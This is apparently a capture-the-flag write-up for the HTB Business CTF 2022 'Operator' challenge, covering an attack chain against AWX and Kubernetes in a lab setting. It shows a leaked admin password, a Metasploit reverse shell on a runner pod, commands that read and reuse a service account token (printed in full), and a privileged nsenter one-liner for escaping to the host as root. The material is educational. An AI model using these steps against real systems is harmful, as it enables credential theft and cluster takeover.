Write-up: Dirty Money - Operator

HTB Business CTF 2022

The HackTheBox Business CTF 2022 featured two cloud challenges. The harder one was Operator, which we will present in the following. Fasten your seatbelts as this will be kind of a ride!

The challenge was stated as such:

We have located Monkey Business operator blog where they are leaking personal informations. We would like you to break into their system and figure out a way to gain full control.

When visiting the given IP address, we are presented with the following screen:

Image of the index page of the Operator web server showing a monkey and information for a password leak.

MonkeyLeaks - Welcome Page

The auction itself contains a link to a repository containing an excerpt of the leak:

Image of the index page of the Operator web server showing a monkey and information for a password leak.

MonkeyLeaks - Personal Leak 2022

Inspecting the code forge further, we find that the MonkeyBusiness Organization has a public repository that contains the following closed issue:

Image of an closed issue from the Monkey Business code forge containing a reference to another repository.

MonkeyBusiness - Closed Issue

This tells us that there might be a repository named awx-k8s-config that contains some confidential information. But how should we access it? As it turns out, although the repository is not listed on the organization page, we can still access it by entering the URL directly (this is hinted as the repository with the leaks is also unlisted).

Within the repository we find that Z10N did indeed remove any credentials — as requested:

Image of an source code diff showing that a plaintext password was deleted from the repository.

MonkeyBusiness - AWX credentials

Now that we got a shiny new password, it is time to see what we can do with it. As it is obviously the admin password for Monkey Business’ AWX (aka. Ansible Tower) instance, we run a quick port scan to see if we can find it:

$ sudo nmapAutomator.sh -t All -H operator.htb

---------------------Starting Full Scan------------------------

22/tcp    open  ssh
80/tcp    open  http
3000/tcp  open  ppp
8443/tcp  open  https-alt
10250/tcp open  unknown
30080/tcp open  unknown

On port 30080, we can indeed find the AWX login page. After logging in with the previously recovered credentials we are presented with the AWX dashboard:

Image of the dashboard of Monkey Business' AWX instance -- logged in as admin.

MonkeyBusiness AWX - Dashboard

But wait! There is more!

As the challenge states, we look for “a way to gain full control”, which we now arguably have, as we have admin access to AWX. But as the AWX instance unfortunately does not contain the flag yet, we need to escalate further.

We start with executing a command via AWX to see where we stand. This can be done actually pretty easy within AWX (if one finds it, as the option is kinda buried in the interface):

Image of the option to run a command on connected instances found under Inventories > Demo Inventory > Hosts.

MonkeyBusiness AWX - Run Command

The run command wizard is pretty straightforward, the most important thing is to use the shell module, which allows to execute more or less arbitrary shell commands on the target instance.

As we now have a way to run commands, we create a reverse shell payload (e.g. with msfvenom) and download and execute the payload with the AWX run command (don’t forget to start a listener in advance 😉):

Image of the run command wizard containing a shell command to download and execute a reverse shell.

MonkeyBusiness AWX - Run Command wizard

First, we check if we maybe find a flag on the runner pod (spoiler: we don’t), second, we check our privileges and third, we see if we find a service token for Kubernetes (during our initial nmap scan we also saw that the Kubernetes API is exposed on the host).

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on
[*] Command shell session 1 opened ( -> at 2022-07-18 10:58:54 +0200

> ls
> id
uid=1000(runner) gid=0(root) groups=0(root)
> ls /var/run/secrets
ls: cannot access '/var/run/secrets': No such file or directory
> exit

Unfortunately, the Kubernetes service account token is not mounted into the pod by default (which is actually good practice). However, since we control AWX, we also control the specification of the runner pod (Instance Groups > default > Edit details > Customize pod specification):

Image of the runner pod specification.

MonkeyBusiness AWX - runner pod specification

Here, we see that automountServiceAccountToken is set to false and the service account is set to default. As the default account often lacks some permissions, we change the service account to monkey-business and mount the token by changing false to true.

Now we can start our shell again and read the service account token:

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on
[*] Command shell session 3 opened ( -> at 2022-07-18 11:11:57 +0200

> ls /var/run/secrets/kubernetes.io/serviceaccount
> cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt
> cat /var/run/secrets/kubernetes.io/serviceaccount/token

Afterwards, we set up kubectl to use our freshly acquired token to authenticate to the exposed Kubernetes API.

cat <<EOF> ca.crt
export APISERVER=https://operator.htb:8443/
export TOKEN=eyJhbGciOiJSUzI1NiIsImtpZCI6IjNBVEp1R3M4U3Z6NzRhMUhaVDgteXlCYVlHQXZPTkplUWZTSlJQaU8tYmsifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiLCJrM3MiXSwiZXhwIjoxNjg5NjcyNTI3LCJpYXQiOjE2NTgxMzY1MjcsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJhd3giLCJwb2QiOnsibmFtZSI6ImF1dG9tYXRpb24tam9iLTgtY25rbGIiLCJ1aWQiOiJmMTdkZDJmOS1mZmQzLTRmMGItYWNiOC1kMzRlMDllYjBjMTUifSwic2VydmljZWFjY291bnQiOnsibmFtZSI6Im1vbmtleS1idXNpbmVzcyIsInVpZCI6Ijg2YTE3OTgxLWU3OWMtNDA4ZS05N2FhLWFjYjQ5YjczMzUwNiJ9LCJ3YXJuYWZ0ZXIiOjE2NTgxNDAxMzR9LCJuYmYiOjE2NTgxMzY1MjcsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDphd3g6bW9ua2V5LWJ1c2luZXNzIn0.FG3pX6-XtGu1fsWGCN-2o2-96rpiivTPoqHrw4mvuhJcMmMOkDl7bgTo0P1smZkldJcTrsj82XNhcXcnMnHW1webQRO7vdTzXiK8dI7sw_R006a1ahG6ZnECFigLGKUBASxdQHhuiHXwmnDqG8Y0Ujt6Sp_Y8qUV4EKeT6AlF8J_dpSWBwqqjm-mjd7Uf2q23O561tEESrb3MOLo33IbXsaG58HIgtt4EauGTSg7n_LG9ZpXuyWfbrizUYzveJMEt86QRIgY6qofKu_yHq5bFzw2HQJdB9AntmF3qc4kOqre9CON4fNXsQZjQCSQQbDvX5y8j6uVAqPIztYXZoFXHg
kubectl config set-cluster awx --server https://operator.htb:8443/ --certificate-authority=ca.crt
kubectl config set-context awx --cluster=awx
kubectl config set-credentials user --token=$TOKEN
kubectl config set-context awx --user=user
kubectl config use-context awx

After setting up kubectl, we check that everything is working as intended:

$ kubectl get -n awx pods
NAME                                               READY   STATUS             RESTARTS      AGE
monkey-business-postgres-0                         1/1     Running            2 (66m ago)   11d
monkey-business-58c9c77bb5-wjrcp                   4/4     Running            8 (66m ago)   11d
automation-job-8-cnklb                             1/1     Running            0             2m9s
awx-operator-controller-manager-6d6f9df796-cqfgs   1/2     ImagePullBackOff   2 (66m ago)   11d

Now that we have access to the Kubernetes cluster, we check the permissions of the service account we used. Turns out we have the permissions to get secrets and start/stop/delete pods in the awx namespace . First guess is to look for the flag within the Kubernetes secrets. Turns out: still not enough for “full control”.

So now we go into full mach-4 hacking mode and try to escalate to the Kubernetes pod. Luckily, we wrote an article not even a week ago, where we presented the following oneliner for Kubernetes privilege escalation:

$ kubectl run h0nk --rm -it --image alpine --privileged --overrides '{"spec":{"hostPID":true}}' --command nsenter -- --mount=/proc/1/ns/mnt

As the boxes in HackTheBox events traditionally have no access to the internet, we have to adjust the oneliner slightly to use one of the stored images on the server. Afterwards, we just have to read the flag from the home directory of the root user:

$ kubectl run -n awx h0nk --rm -it --image quay.io/centos/centos:stream8 --image-pull-policy Never --privileged --overrides '{"spec":{"hostPID":true}}' --command nsenter -- --mount=/proc/1/ns/mnt
If you don't see a command prompt, try pressing enter.
uid=0(root) gid=0(root) groups=0(root)
# cat /root/flag.txt
# exit
Session ended, resume using 'kubectl attach h0nk -c h0nk -i -t' command when the pod is running
pod "h0nk" deleted
Yes! Finally!

Stefan Feuerstein

Managing director and co-founder

IT security likes to market itself with exaggerated scare tactics. Respect for the topic is important, but important decisions must not be driven by fear.

July 18, 2022